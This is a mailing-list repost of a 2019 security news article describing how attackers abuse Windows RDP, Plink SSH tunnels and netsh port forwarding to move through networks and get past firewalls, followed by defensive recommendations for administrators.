[BreachExchange] HACKERS ARE USING ‘NETWORK TUNNELING’ TO BYPASS THE FIREWALL INSTEAD OF RDP

[Destry Winant]

https://www.securitynewspaper.com/2019/01/25/hackers-are-using-network-tunneling-to-bypass-the-firewall-instead-of-rdp/

Network tunneling technique is being increasingly used for attackers using RDP

The Remote Desktop Protocol (RDP) is a Windows component designed to
provide administrators and users with a remote access path to their
systems. According to network security and ethical hacking from the
International Institute of Cyber Security report that malicious
hackers have been abusing this feature to attack vulnerable systems,
because sometimes this kind of attacks can be more difficult to detect
than a backdoor.

“Malicious users resort to the use of RDP because of its stability and
functionality over a backdoor. We have detected that hackers use the
native functions of Windows RDP to connect laterally through systems
in compromised environments,” commented the specialists.

According to network security specialists, access to a system via RDP
allows attackers to gain persistence, although it depends on an
additional attack vector to enter the compromised system, such as a
phishing attack, for example. In addition, attackers have increasingly
resorted to ‘network tunneling’ and host-based port forwarding.

Because of this, attackers can establish a connection to a remote
server blocked by a firewall to exploit that connection and use it as
a means of transport to ‘dig a tunnel’ to local services through the
firewall.

A utility that is used to channel RDP sessions is Putty Link, or
Plink, which allows attackers to establish SSH connections to other
systems. According to network security experts, because many
environments do not inspect the protocols or block SSH communications
that exit their network, attackers can use the tool to create
encrypted tunnels and establish RDP connections with C&C.

On the other hand, RDP sessions also allow attackers to move sideways
through an environment; attackers can use the native network Shell
command in Windows (netsh) to use RDP port forwarding to discover
segmented networks.

Host and network-based prevention and detection mechanisms must
provide organizations with the necessary defenses to mitigate these
kinds of attacks, experts say.

Also, disabling RDP when not in use, enabling firewall rules on host
to prohibit incoming RDP connections are helpful tips for reinforcing
risk prevention.

On the other hand, at network level administrators must enforce RDP
connections from a designated mailbox or central administration
server, avoid using privileged accounts for RDP, revise firewall rules
to identify port forwarding vulnerabilities and inspecting the content
of network traffic.